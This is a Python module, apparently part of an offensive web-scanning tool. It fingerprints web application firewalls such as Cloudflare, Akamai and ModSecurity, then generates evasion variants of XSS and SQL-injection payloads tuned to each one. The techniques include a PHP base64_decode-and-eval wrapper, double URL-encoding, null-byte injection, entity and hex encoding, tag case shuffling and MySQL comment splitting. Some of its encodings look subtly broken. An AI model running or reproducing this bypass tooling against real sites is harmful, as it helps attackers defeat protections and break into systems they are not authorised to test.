"""WAF detection and evasion layer — fingerprints web application firewalls
and generates payload variants to bypass them."""

import base64
import re
import threading
import time
from dataclasses import dataclass, field
from typing import Any
from urllib.parse import urlparse

from modules.utils import safe_get

try:
    import requests
    HAS_REQUESTS = True
except ImportError:
    HAS_REQUESTS = False


_CACHE_TTL = 300


@dataclass
class WafFingerprint:
    name: str
    version: str | None = None
    detection_headers: dict[str, str] = field(default_factory=dict)
    confidence: float = 0.0


class WAFDetector:
    """Fingerprint WAF by analysing HTTP responses."""

    WAF_SIGNATURES: list[dict[str, Any]] = [
        {
            "name": "Cloudflare",
            "headers": {"cf-ray": "", "__cfduid": "", "cf-cache-status": ""},
            "body": re.compile(r"cloudflare|__cfduid|cf-ray", re.I),
        },
        {
            "name": "Akamai",
            "headers": {"x-akamai-transformed": "", "x-akamai-request-id": ""},
            "body": re.compile(r"akamai|AkamaiGHost", re.I),
        },
        {
            "name": "ModSecurity",
            "headers": {"x-engine": ""},
            "body": re.compile(r"ModSecurity|Not Acceptable", re.I),
        },
        {
            "name": "AWS WAF",
            "headers": {"x-amzn-requestid": "", "x-amzn-errortype": ""},
            "body": re.compile(r"AWSWAF|Request blocked|waf", re.I),
        },
        {
            "name": "F5 BigIP",
            "headers": {"x-cnection": "", "x-asf": ""},
            "body": re.compile(r"big.?ip|F5", re.I),
        },
        {
            "name": "Imperva/Incapsula",
            "headers": {"x-iinfo": "", "x-cdn": "incapsula"},
            "body": re.compile(r"incapsula|imperva", re.I),
            "cookies": re.compile(r"incap_ses|visid_incap", re.I),
        },
        {
            "name": "Sucuri",
            "headers": {"x-sucuri-id": "", "x-sucuri-cache": ""},
            "body": re.compile(r"Sucuri|cloudproxy", re.I),
        },
        {
            "name": "Wordfence",
            "headers": {"x-wordfence": ""},
            "body": re.compile(r"Wordfence|Generated by Wordfence", re.I),
        },
    ]

    GENERIC_PATTERNS: list[dict[str, Any]] = [
        {"name": "Generic WAF (blocked)", "status": 403, "body": re.compile(
            r"blocked|access denied|forbidden|invalid request|malformed request", re.I
        )},
        {"name": "Generic WAF (method)", "status": 405, "body": re.compile(
            r"method not allowed", re.I
        )},
        {"name": "Generic WAF (not acceptable)", "status": 406, "body": re.compile(
            r"not acceptable", re.I
        )},
    ]

    @classmethod
    def detect(cls, url: str, session: Any | None = None,
               timeout: int = 10) -> WafFingerprint | None:
        """Run all WAF signatures against the target URL and return the best match."""
        if not HAS_REQUESTS:
            return None
        s = session or requests.Session()
        try:
            resp = safe_get(s, url, timeout=timeout, raise_for_status=False)
            if resp is None:
                resp = s.get(url, timeout=timeout, allow_redirects=True)
        except Exception:
            return None

        headers_lower = {k.lower(): v for k, v in resp.headers.items()}
        body_text = resp.text or ""
        status = resp.status_code

        candidates: list[WafFingerprint] = []

        for sig in cls.WAF_SIGNATURES:
            name = sig["name"]
            matched_headers: dict[str, str] = {}
            header_hits = 0
            total_header_keys = len(sig["headers"])

            for hkey, hval in sig["headers"].items():
                hl = hkey.lower()
                if hl in headers_lower:
                    matched_headers[hkey] = headers_lower[hl]
                    if not hval or hval.lower() in headers_lower[hl].lower():
                        header_hits += 1

            body_match = bool(sig.get("body") and sig["body"].search(body_text))
            cookie_match = bool(
                sig.get("cookies") and
                any(sig["cookies"].search(str(v)) for v in resp.cookies.values())
            )

            if header_hits > 0 or body_match or cookie_match:
                conf = 0.0
                if header_hits and total_header_keys:
                    conf += 0.4 * (header_hits / total_header_keys)
                if body_match:
                    conf += 0.35
                if cookie_match:
                    conf += 0.25
                conf = min(conf, 1.0)
                candidates.append(WafFingerprint(
                    name=name,
                    detection_headers=matched_headers,
                    confidence=round(conf, 2),
                ))

        if not candidates:
            for sig in cls.GENERIC_PATTERNS:
                if status == sig["status"] and sig["body"].search(body_text):
                    candidates.append(WafFingerprint(
                        name=sig["name"],
                        detection_headers={},
                        confidence=0.5,
                    ))
                    break

        if not candidates:
            return None
        candidates.sort(key=lambda x: x.confidence, reverse=True)
        return candidates[0]


class EncodingStrategy:
    """Generate payload variants for WAF evasion."""

    @staticmethod
    def base64_encode(payload: str) -> list[str]:
        results = []
        try:
            encoded = base64.b64encode(payload.encode()).decode()
            results.append(f"echo base64_decode('{encoded}');")
            results.append(f"$x=base64_decode('{encoded}');eval($x);")
        except Exception:
            pass
        return results

    @staticmethod
    def hex_encode(payload: str) -> list[str]:
        hexed = "".join(f"\\x{ord(c):02x}" for c in payload)
        return [hexed]

    @staticmethod
    def unicode_normalize(payload: str) -> list[str]:
        result = "".join(f"\\u{ord(c):04x}" for c in payload)
        return [result]

    @staticmethod
    def url_encode(payload: str) -> list[str]:
        variants = []
        single = "".join(f"%{ord(c):02x}" for c in payload)
        variants.append(single)
        double = "".join(f"%25{ord(c):02x}" for c in payload)
        variants.append(double)
        mixed = []
        for i, c in enumerate(payload):
            if i % 2 == 0:
                mixed.append(f"%{ord(c):02x}")
            else:
                mixed.append(f"%25{ord(c):02x}")
        variants.append("".join(mixed))
        return variants

    @staticmethod
    def utf7_encode(payload: str) -> list[str]:
        utf7_map = {
            "<": "+ADw-", ">": "+AD4-", "/": "+AC8-",
            "'": "+ACA-", '"': "+ACI-", "(": "+ACg-",
            ")": "+ACk-", "=": "+AD0-", ";": "+ADs-",
            " ": "+ACA-",
        }
        result = "".join(utf7_map.get(c, c) for c in payload)
        return [result]

    @staticmethod
    def html_entity_encode(payload: str) -> list[str]:
        return ["".join(f"&#{ord(c)};" for c in payload)]

    @staticmethod
    def case_permute(payload: str) -> list[str]:
        tokens = re.split(r"(<\/?[a-zA-Z]+)", payload)
        for i, token in enumerate(tokens):
            tag_match = re.match(r"^<\/?([a-zA-Z]+)", token)
            if tag_match:
                tag = tag_match.group(1)
                prefix = token[:token.index(tag)]
                perms = EncodingStrategy._case_shuffle(tag)
                tokens[i] = prefix + perms[0] + token[token.index(tag) + len(tag):]
        return ["".join(tokens)]

    @staticmethod
    def _case_shuffle(word: str) -> list[str]:
        length = len(word)
        results = set()
        results.add(word.lower())
        results.add(word.upper())
        results.add(word.capitalize())
        results.add(word[0].upper() + word[1:].lower())
        if length >= 2:
            results.add(word[0].lower() + word[1].upper() + word[2:].lower())
        if length >= 3:
            alt = "".join(
                c.upper() if i % 2 == 0 else c.lower()
                for i, c in enumerate(word)
            )
            results.add(alt)
        return list(results)

    @staticmethod
    def whitespace_fragment(payload: str) -> list[str]:
        result = re.sub(
            r"(?<=[a-zA-Z])(?=[A-Z])", "  ", payload
        )
        result = re.sub(
            r"(?<=[a-zA-Z])(?=[A-Z])", "  ", result
        )
        result = result.replace("<", "< ").replace(">", " >")
        result = re.sub(r"\s{2,}", "  ", result)
        return [result]

    @staticmethod
    def null_byte_inject(payload: str) -> list[str]:
        result = re.sub(
            r"(?<=[a-z])(?=[a-z])", "%00", payload, flags=re.I
        )
        return [result]

    @staticmethod
    def comment_inject(payload: str) -> list[str]:
        result = re.sub(
            r"(?<=<)(?=[a-zA-Z/])", "!---->", payload
        )
        return [result]

    @staticmethod
    def comment_mysql(payload: str) -> list[str]:
        variants = []
        variants.append(re.sub(r"\s+OR\s+", "/**/OR/**/", payload, flags=re.I))
        variants.append(re.sub(r"\s+AND\s+", "/**/AND/**/", payload, flags=re.I))
        variants.append(re.sub(r"\s+", "/**/", payload))
        return variants


class WafEvasionEngine:
    """Main WAF evasion interface — detect, cache, and generate bypass payloads."""

    def __init__(self, config: dict[str, Any] | None = None):
        self.config = config or {}
        self._session: Any = None
        self._lock = threading.Lock()
        self._cache: dict[str, tuple[float, WafFingerprint | None]] = {}
        self._detector = WAFDetector()

    def _get_session(self) -> Any:
        if self._session is None:
            if HAS_REQUESTS:
                self._session = requests.Session()
        return self._session

    def detect_waf(self, url: str) -> WafFingerprint | None:
        host = urlparse(url).netloc
        now = time.time()

        with self._lock:
            if host in self._cache:
                ts, fp = self._cache[host]
                if now - ts < _CACHE_TTL:
                    return fp

        fp = self._detector.detect(url, session=self._get_session(),
                                   timeout=self.config.get("timeout", 10))

        with self._lock:
            self._cache[host] = (now, fp)

        return fp

    def select_strategy(self, waf_name: str, payload_type: str) -> list[str]:
        normalised = waf_name.lower() if waf_name else ""

        if "cloudflare" in normalised:
            return ["comment_inject", "unicode_normalize", "case_permute",
                    "html_entity_encode"]
        if "modsecurity" in normalised:
            return ["whitespace_fragment", "null_byte_inject", "url_encode",
                    "html_entity_encode"]
        if "akamai" in normalised:
            return ["hex_encode", "base64_encode", "url_encode",
                    "unicode_normalize"]
        if "aws" in normalised or "amazon" in normalised:
            return ["case_permute", "comment_inject", "html_entity_encode",
                    "url_encode"]
        if "imperva" in normalised or "incapsula" in normalised:
            return ["url_encode", "comment_inject", "hex_encode",
                    "unicode_normalize"]
        if "sucuri" in normalised:
            return ["case_permute", "html_entity_encode", "url_encode"]
        if "wordfence" in normalised:
            return ["whitespace_fragment", "comment_inject", "null_byte_inject"]
        if "f5" in normalised or "bigip" in normalised:
            return ["url_encode", "hex_encode", "base64_encode",
                    "comment_mysql" if payload_type in ("sqli", "sql") else "comment_inject"]
        if "generic" in normalised:
            return ["url_encode", "case_permute", "html_entity_encode",
                    "comment_inject", "null_byte_inject"]

        return ["url_encode", "case_permute", "comment_inject",
                "html_entity_encode", "hex_encode", "base64_encode",
                "unicode_normalize", "whitespace_fragment", "null_byte_inject"]

    def evade(self, payload: str, payload_type: str = "xss",
              waf: WafFingerprint | None = None) -> list[str]:
        waf_name = waf.name if waf else ""
        strategies = self.select_strategy(waf_name, payload_type)

        variants: list[str] = [payload]
        method_map = {
            "base64_encode": EncodingStrategy.base64_encode,
            "hex_encode": EncodingStrategy.hex_encode,
            "unicode_normalize": EncodingStrategy.unicode_normalize,
            "url_encode": EncodingStrategy.url_encode,
            "utf7_encode": EncodingStrategy.utf7_encode,
            "html_entity_encode": EncodingStrategy.html_entity_encode,
            "case_permute": EncodingStrategy.case_permute,
            "whitespace_fragment": EncodingStrategy.whitespace_fragment,
            "null_byte_inject": EncodingStrategy.null_byte_inject,
            "comment_inject": EncodingStrategy.comment_inject,
            "comment_mysql": EncodingStrategy.comment_mysql,
        }

        for name in strategies:
            fn = method_map.get(name)
            if fn:
                try:
                    result = fn(payload)
                    if isinstance(result, list):
                        variants.extend(result)
                except Exception:
                    pass

        seen: set[str] = set()
        deduped: list[str] = []
        for v in variants:
            if v not in seen:
                seen.add(v)
                deduped.append(v)
        return deduped

    def get_evasive_payloads(self, base_payload: str, payload_type: str,
                             url: str) -> list[str]:
        waf = self.detect_waf(url)
        return self.evade(base_payload, payload_type=payload_type, waf=waf)

    def clear_cache(self) -> None:
        with self._lock:
            self._cache.clear()
